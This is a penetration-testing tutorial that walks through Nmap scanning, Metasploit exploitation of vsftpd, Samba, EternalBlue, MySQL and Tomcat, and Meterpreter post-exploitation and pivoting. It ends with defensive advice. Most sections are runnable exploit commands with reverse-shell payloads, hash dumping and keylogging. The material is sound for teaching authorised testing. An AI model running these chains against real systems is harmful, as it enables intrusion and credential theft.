Server-Side Attacks: Nmap, Metasploit & Service Exploitation

1. Attack Methodology Overview

Server-side attacks follow a structured intelligence-gather-then-exploit loop. Rushing to exploitation without thorough enumeration leads to missed vulnerabilities and noisy, failed attempts.

Target scoping — define the IP range, resolve hostnames, identify live hosts
Port discovery — find all open TCP/UDP ports (full port scan)
Service & version detection — identify what is running on each port
Vulnerability research — cross-reference versions against CVE databases and Metasploit modules
Exploitation — run the appropriate exploit with correct options
Post-exploitation — enumerate the system, escalate privileges, pivot
Reporting — document with timestamps, screenshots, and impact analysis

Authorisation required All techniques in this guide must only be performed on systems you own or have explicit written permission to test. Unauthorised port scanning and exploitation is illegal in most jurisdictions regardless of intent.

2. Nmap — Service & Version Detection

Nmap is the foundation of network reconnaissance. The flags you choose determine how much information you get vs how much noise you make on the network.

Discovery scan — find live hosts first

# ICMP ping sweep — fast host discovery
nmap -sn 192.168.1.0/24

# ARP ping (local network, more reliable)
nmap -PR -sn 192.168.1.0/24

# Skip ping — scan all IPs regardless of ICMP response
nmap -Pn 192.168.1.0/24

Full TCP port scan with version detection

# Scan all 65535 ports + version detection
nmap -p- -sV 192.168.1.100

# Aggressive scan — version + OS + script + traceroute
nmap -A -p- 192.168.1.100

# Fast scan of top 1000 ports first, then expand
nmap -sV --top-ports 1000 192.168.1.100

# Save output in all formats (normal, grepable, XML)
nmap -sV -oA output/target_scan 192.168.1.100

Version detection intensity

The -sV flag probes services to determine their version. The --version-intensity flag (0–9) controls how aggressively Nmap probes:

Flag	Description	Noise
`--version-light`	Fastest, most likely probes only	Low
`-sV` (default)	Standard intensity (level 7)	Medium
`--version-all`	All probes — maximum accuracy	High

Vulnerability scripts (NSE)

Nmap's Scripting Engine (NSE) runs Lua scripts against discovered services. The vuln category runs checks for known CVEs:

# Run all vulnerability check scripts
nmap --script vuln -p 21,22,80,443,445,3389 192.168.1.100

# Specific service scripts
nmap --script ftp-anon,ftp-vsftpd-backdoor -p 21 192.168.1.100
nmap --script smb-vuln-ms17-010 -p 445 192.168.1.100
nmap --script http-shellshock -p 80,443 192.168.1.100
nmap --script ssl-heartbleed -p 443 192.168.1.100

# Auth and brute-force scripts
nmap --script ssh-brute -p 22 192.168.1.100
nmap --script http-auth-finder -p 80 192.168.1.100

UDP scan — don't forget non-TCP services

# UDP scan (requires root, slower)
nmap -sU --top-ports 100 192.168.1.100

# Common UDP targets: DNS (53), SNMP (161), NTP (123), TFTP (69)

3. Interpreting Nmap Output

Reading Nmap output correctly determines which path to exploitation. Here's how to analyse a real scan result:

PORT     STATE  SERVICE     VERSION
21/tcp   open   ftp         vsftpd 2.3.4
22/tcp   open   ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp   open   http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open   netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3306/tcp open   mysql       MySQL 5.0.51a-3ubuntu5
5900/tcp open   vnc         VNC (protocol 3.3)
8180/tcp open   http        Apache Tomcat/Coyote JSP engine 1.1

Every highlighted line above is a known exploitable version:

vsftpd 2.3.4 — contains a backdoor (CVE-2011-2523). Triggered by a smiley face in the username. Gives root shell on port 6200.
OpenSSH 4.7p1 — vulnerable to username enumeration (CVE-2018-15473).
Samba 3.0.20 — vulnerable to usermap_script command execution (CVE-2007-2447). No authentication required.
VNC protocol 3.3 — older version often with no authentication or weak 8-byte password.

Version accuracy Nmap's version detection reads service banners and probes. Some services fake or suppress banners. If a version looks too old or generic, run --version-all to probe harder, or connect manually with nc to read the raw banner.

Manual banner grabbing

# Grab raw banner with netcat
nc -nv 192.168.1.100 21
# Response: 220 (vsFTPd 2.3.4)

nc -nv 192.168.1.100 25
# Response: 220 mail.target.com ESMTP Postfix (Ubuntu)

# HTTP banner with curl
curl -I http://192.168.1.100/
# Server: Apache/2.2.8 (Ubuntu) DAV/2

4. Rapid7 — CVE & Module Research

Once you have service versions, you need to find whether exploits exist. Rapid7 maintains two invaluable resources: the Metasploit module database and the Vulnerability & Exploit Database.

Rapid7 Vulnerability Database

At rapid7.com/db/ you can search by CVE number, software name, or vulnerability type. Each entry shows:

CVE identifier and CVSS score
Affected versions (exact range)
Whether a Metasploit module exists (and its path)
Proof-of-concept code and references

Searching Metasploit for a specific version

# Search by CVE
msf6 > search cve:2007-2447

# Search by product name and type
msf6 > search name:vsftpd type:exploit
msf6 > search name:samba type:exploit
msf6 > search name:ms17-010

# Filter by platform
msf6 > search platform:linux type:exploit rank:excellent

# Search by port
msf6 > search port:21

Understanding module ranks

Rank	Meaning
ExcellentRanking	Reliable, no crash risk, clean exploitation
GreatRanking	Works well, minor side effects possible
GoodRanking	Functional but may not work in all conditions
NormalRanking	Works but has reliability constraints
AverageRanking	Not reliable, use only if nothing better exists
ManualRanking	Requires manual interaction or is a DoS risk

Always prefer excellent or great rank modules in engagements. Lower-rank modules can crash the service and take down production systems.

5. Metasploit Framework — Core Workflow

Metasploit is an open-source penetration testing framework maintained by Rapid7. It provides a consistent interface to hundreds of exploits, payloads, auxiliary modules, and post-exploitation tools.

Initialising Metasploit with database

# Start PostgreSQL and Metasploit services (Kali)
sudo systemctl start postgresql
sudo msfdb init
msfconsole

# Import Nmap results directly into the database
msf6 > db_import /output/target_scan.xml

# View discovered hosts and services
msf6 > hosts
msf6 > services
msf6 > services -p 445          # filter by port
msf6 > services -S vsftpd       # filter by service name

# Run Nmap directly from within msfconsole
msf6 > db_nmap -sV -p- 192.168.1.100

Core module commands

# Select a module
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

# View required options
msf6 exploit(vsftpd_234_backdoor) > show options

# Set required values
msf6 > set RHOSTS 192.168.1.100
msf6 > set RPORT  21
msf6 > set LHOST  192.168.1.50   # your attacker IP
msf6 > set LPORT  4444

# View available payloads for the selected exploit
msf6 > show payloads

# Set a specific payload
msf6 > set payload cmd/unix/interact

# Run with/without check first
msf6 > check         # passive check — does target appear vulnerable?
msf6 > run           # or: exploit

# Run against multiple hosts from database
msf6 > set RHOSTS file:/path/to/hosts.txt
msf6 > run -j         # run as background job

Auxiliary modules — scanners without exploitation

# SMB version scanner
msf6 > use auxiliary/scanner/smb/smb_version
msf6 > set RHOSTS 192.168.1.0/24
msf6 > run

# FTP anonymous login scanner
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 > set RHOSTS 192.168.1.0/24
msf6 > run

# SSH brute force
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 > set RHOSTS 192.168.1.100
msf6 > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
msf6 > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 > set STOP_ON_SUCCESS true
msf6 > run

# HTTP directory scanner
msf6 > use auxiliary/scanner/http/dir_scanner
msf6 > set RHOSTS 192.168.1.100
msf6 > run

6. Exploiting Common Services

SERVICE 01 FTP — vsftpd 2.3.4 Backdoor (CVE-2011-2523)

vsftpd 2.3.4 was trojanised on the official download server. The backdoor activates when a smiley face :) is appended to any username. It opens a root shell listener on port 6200.

# Detection: Nmap shows vsftpd 2.3.4
PORT  STATE SERVICE VERSION
21/tcp open  ftp     vsFTPd 2.3.4

# Exploit
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > run

# Result
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
Command shell session 1 opened

The backdoor opens a cmd/unix/interact shell. Upgrade it to a Meterpreter session by running a stager payload through the shell.

SERVICE 02 SMB — Samba usermap_script (CVE-2007-2447)

Samba 3.0.0–3.0.25rc3 allows command injection through shell metacharacters in the username when using the non-default username map script option. No credentials required.

# Detection
nmap --script smb-vuln-cve-2007-2447 -p 445 192.168.1.100

# Exploit
msf6 > use exploit/multi/samba/usermap_script
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/reverse_netcat
msf6 > set LHOST 192.168.1.50
msf6 > run

# Result: root shell without authentication
uid=0(root) gid=0(root)

SERVICE 03 SMB — EternalBlue MS17-010 (CVE-2017-0144)

EternalBlue exploits a buffer overflow in SMBv1's handling of transaction requests. The NSA-developed exploit was leaked and later used by WannaCry and NotPetya. Unpatched Windows systems (XP, 7, Server 2008) are affected.

# Detect with Nmap NSE
nmap --script smb-vuln-ms17-010 -p 445 192.168.1.100
# Output: VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1

# Exploit (deliver Meterpreter)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.100
msf6 > set LHOST 192.168.1.50
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > run

# If first attempt fails, try the psexec variant
msf6 > use exploit/windows/smb/ms17_010_psexec

SERVICE 04 SSH — Username Enumeration (CVE-2018-15473)

OpenSSH before 7.7 responds differently to authentication attempts for valid vs invalid usernames during the key exchange phase, allowing enumeration without a password.

# Metasploit module
msf6 > use auxiliary/scanner/ssh/ssh_enumusers
msf6 > set RHOSTS 192.168.1.100
msf6 > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
msf6 > set CHECK_FALSE true
msf6 > run

# Then brute force valid usernames
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 > set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt
msf6 > run

SERVICE 05 MySQL — UDF Command Execution (root login)

When MySQL runs as root and allows remote root login with a weak or no password, the UDF (User-Defined Function) technique writes a shared library to the plugin directory and creates a function that executes OS commands.

# Check for root login
msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 > set RHOSTS 192.168.1.100
msf6 > set USERNAME root
msf6 > set BLANK_PASSWORDS true
msf6 > run

# UDF exploitation once root access confirmed
msf6 > use exploit/multi/mysql/mysql_udf_payload
msf6 > set RHOSTS 192.168.1.100
msf6 > set USERNAME root
msf6 > set PASSWORD 
msf6 > set payload linux/x86/meterpreter/reverse_tcp
msf6 > run

SERVICE 06 Apache Tomcat — Manager Deploy (CVE multiple)

Apache Tomcat's Manager interface allows deploying WAR files. If exposed and using default or weak credentials, an attacker can deploy a malicious WAR containing a JSP web shell or Meterpreter stager.

# Scan for manager interface
nmap --script http-tomcat-manager -p 8080,8180,8443 192.168.1.100

# Brute force manager credentials
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 > set RHOSTS 192.168.1.100
msf6 > set RPORT  8180
msf6 > run

# Deploy malicious WAR file
msf6 > use exploit/multi/http/tomcat_mgr_upload
msf6 > set RHOSTS 192.168.1.100
msf6 > set RPORT  8180
msf6 > set HttpUsername tomcat
msf6 > set HttpPassword tomcat
msf6 > set payload java/meterpreter/reverse_tcp
msf6 > run

7. Meterpreter — Post-Exploitation

Meterpreter is Metasploit's advanced in-memory payload. It runs entirely in RAM, leaves no files on disk, and communicates over an encrypted channel. It is the standard payload for post-exploitation work.

Core Meterpreter commands

# System information
meterpreter > sysinfo
meterpreter > getuid          # current user
meterpreter > getpid          # process ID
meterpreter > ps              # running processes

# Privilege escalation
meterpreter > getsystem       # attempt automated priv esc
meterpreter > getuid          # verify: NT AUTHORITY\SYSTEM

# Credential dumping
meterpreter > hashdump        # dump local SAM database (Windows)
meterpreter > run post/linux/gather/hashdump     # Linux /etc/shadow
meterpreter > run post/multi/recon/local_exploit_suggester  # find local exploits

# File system
meterpreter > pwd
meterpreter > ls
meterpreter > download /etc/passwd .
meterpreter > upload shell.php /var/www/html/
meterpreter > search -f *.conf -d /etc

# Networking
meterpreter > ifconfig
meterpreter > arp
meterpreter > route

# Screenshot and keylogger
meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

Process migration

The process Meterpreter initially runs in may be killed by the user or an AV. Migrate to a stable, long-running process for persistence:

# List processes and find a stable target
meterpreter > ps
# PID   Name        Arch  User
# 1234  explorer.exe  x64  DESKTOP\masaaki
# 4567  svchost.exe   x64  NT AUTHORITY\SYSTEM  ← migrate here

meterpreter > migrate 4567

Session management

# Background current session and list all sessions
meterpreter > background
msf6 > sessions -l

# Interact with a session
msf6 > sessions -i 1

# Upgrade a basic shell to Meterpreter
msf6 > sessions -u 1

8. Pivoting & Port Forwarding

When you compromise a host that has access to an internal network unreachable from your machine, you pivot through it to reach the next target.

# Add a route through a compromised host
msf6 > route add 10.10.10.0/24 1   # via session 1
msf6 > route print

# Now scan internal network through the pivot
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set RHOSTS 10.10.10.0/24
msf6 > set PORTS  22,80,443,3389,445
msf6 > run

# Port forward — map internal port to your local port
meterpreter > portfwd add -l 13306 -p 3306 -r 10.10.10.50
# Now connect: mysql -h 127.0.0.1 -P 13306

# SOCKS proxy through pivot (for tools like proxychains)
msf6 > use auxiliary/server/socks_proxy
msf6 > set VERSION 5
msf6 > set SRVPORT 1080
msf6 > run -j
# Then: proxychains nmap -sV 10.10.10.50

9. Detection & Prevention

Patch Management

Every service in this post was exploited via a known CVE. Apply security patches within 30 days of release, prioritising internet-facing services.

Disable Legacy Protocols

Disable SMBv1 entirely. Do not run FTP — use SFTP. Disable Telnet, rsh, rlogin. These protocols have no place on modern infrastructure.

Firewall Segmentation

Restrict which hosts can reach which ports. Database ports (3306, 5432) should never be reachable from the internet. Use network ACLs and host-based firewalls.

Default Credential Audit

Scan your own network with the same Metasploit auxiliary modules. Any service accepting default or empty passwords is an immediate remediation item.

IDS / IPS Monitoring

Deploy Snort or Suricata with updated rule sets. EternalBlue, vsftpd backdoor, and Tomcat exploit traffic all have well-known signatures.

Run Services as Non-Root

MySQL, Apache, Nginx, and most services should not run as root. Use dedicated low-privilege service accounts. If the service is exploited, the attacker gets that account — not root.